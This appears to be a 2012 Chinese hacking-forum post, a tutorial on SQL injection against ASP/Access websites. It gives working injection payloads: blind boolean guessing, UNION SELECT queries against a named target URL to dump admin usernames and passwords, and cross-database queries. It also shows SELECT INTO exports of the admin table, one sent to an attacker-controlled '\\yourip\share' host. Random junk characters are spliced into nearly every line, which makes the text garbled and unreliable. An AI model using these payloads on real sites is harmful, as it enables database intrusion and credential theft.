--------------------------------------------------------------
- x+ i/ |) O. ~, x" ounion查询法
9 J& U4 a! R2 r/ }# z( \首先要说的就是查询办法,一般的查询办法就是( H; z3 }- b" \+ k8 F$ S- n+ l
2 P% T% X9 k0 L程序代码* p- k- ]& C3 A7 r
and 1=(select count(*) from admin where left(id,1)='1')
/ j6 z1 Y, O+ B' l6 M( U& F. V! O" e
+ c3 h' Z2 o* b这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
6 i( W+ B* v6 \8 S [6 i所以这个时候,union select横空出现.别以为只能在PHP里用哦..." g: N d8 Z5 L9 `3 t) c
譬如你有一个ACCESS点:
+ |1 C3 e0 M& }程序代码( x2 P1 B2 G; _ q% I
http://bbs.tian6.com/xiaoyang.asp?coder=18 i' O; o/ w. g4 Q* J; }2 E
! M; ?! T' d( y9 b7 r
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
d' j7 {& l1 [. O然后我们直接来:
$ _0 [6 t4 i4 i: V# B5 y, D: F程序代码
0 ?5 {; z$ p: `, ?; H! {2 hhttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
, [' j6 {) P l( }0 ]: m- M8 ]
; C9 t$ T9 \* k4 S: G! S这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
. x# R D5 U# A3 o. p, b3 f4 b( ], l0 y1 s
# j/ U) k$ X& g' k" o; N+ Z
9 _: s4 o: f, f---------------------------------------------------------------: I# j2 ^, F1 ]9 M7 a a" ^9 H
Access跨库查询
6 v. Q7 K8 Z1 s8 L& W) e* M有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.. U, [! j3 T2 M
跨库的查询语句:
, O( s7 q: T8 ?. {: ?子查询:
4 g8 ?! |( n% \! C( m程序代码
' B) ~& g; T4 s6 V! eand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
$ |: R% U6 X& @& o" W' S2 c5 D7 r- h$ q! z2 Z* @& ~8 m" ~
union查询:( P) R8 n# \8 O5 x$ y+ N
程序代码% O* r3 T& V8 k' ]& o
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=15 s( l1 u& }/ U( Y+ B
' {9 p7 t: @1 E3 Y& y
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
# m# w) N) M; Y+ q" Z L程序代码
5 B6 y! E d. d' u$ R' \2 _http://www.4ngel.net/article/46.htm + [* d9 P" ?% _8 f0 L; A
http://hf110.com/Article/hack/rqsl/200502/66.html$ u" \5 i( Q8 o9 A) }
% v C$ y6 Q! K' V3 {0 Z---------------------------------------------------------------1 k. r5 F4 g" g3 d) k2 `8 U4 ]
Access注入,导出txt,htm,html6 @5 z7 d/ B2 r- i6 h
子查询语句:
: P9 p+ j, r" W6 [程序代码. r% Y( |5 V2 h1 G1 Z' m$ f
Select * into [test.txt] in 'd:\web\' 'text;' from admin
# e, C( _6 Z: m7 K& R
# V4 T, H6 h. W这样就把admin表的内容以test类型存进了d:\web里面.
% f) `% K. N$ Q- dUNION查询:. Q: Q/ f4 {" p8 o4 ?
程序代码; V: ^! x) k; y. d M2 X# L
union select * into [admin.txt] in 'c:\' 'test;' from admin5 X9 ^& K8 x3 {" _
3 Z) ]6 U8 a6 I A" g* N而且这里也可以保存到本地来:: C7 S" W$ f( ]9 x: t
程序代码
0 W, G, Q, S" r6 l1 \) z0 c& XSelect * into [test.txt] in '\\yourip\share' 'text;' from admin! ]5 W7 b. x# Z+ l' B
! B: J/ ?) X& y% a r+ F
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
6 r ~! j# m2 Y' o9 s
' h+ ] ~: t. [& j4 V程序代码$ d* I) K$ x9 C9 q) ]; b
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
0 p. ?: X& ?% R- `6 `2 t# o, I9 C- |1 M0 E& I' l6 e0 _
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.4 y+ h7 q. i$ t) y5 E
|
发表于 2012-9-15 14:20:57
收藏
支持
反对